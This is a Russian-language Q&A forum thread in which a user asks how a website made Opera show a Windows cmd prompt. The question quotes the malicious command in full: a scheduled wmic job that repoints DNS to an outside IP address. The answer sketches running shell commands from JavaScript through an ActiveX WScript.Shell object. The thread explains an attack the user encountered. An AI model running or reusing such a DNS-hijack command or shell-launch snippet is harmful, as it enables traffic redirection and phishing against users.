Как браузеру удается выполнить команду в cmd?

2543
Paul

Некоторое время назад при посещении какого-либо веб-сайта в Opera 12.12 на экране появилось следующее приглашение Windows 7:

C:\Windows\SysWOW64\cmd.exe /c at 13:29:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.202", "8.8.8.8") 

Очевидно, я отказался от этого.

Метод, с помощью которого фишеры пытались получить мои данные, довольно понятен, но как им удалось выполнить команду из браузера?

3

1 ответ на вопрос

2
duDE

Фишеры могут использовать Javascript следующим образом:

var wsh = new ActiveXObject('WScript.Shell'); command = 'cmd /k ' + 'what ever ...'; wsh.Run(command); 

Это работает, только если вы отключите функции безопасности в вашем браузере, которые должны будут использовать ActiveX.

Упс ... Никогда не знал, что Opera умеет работать с ActiveX. Думал, что это работает только в IE. Paul 9 лет назад 2
Какие? ActiveX в опере? Как я понимаю [эта страница справки Opera] (http://help.opera.com/Windows/12.10/en/activex.html), это не так. nixda 9 лет назад 0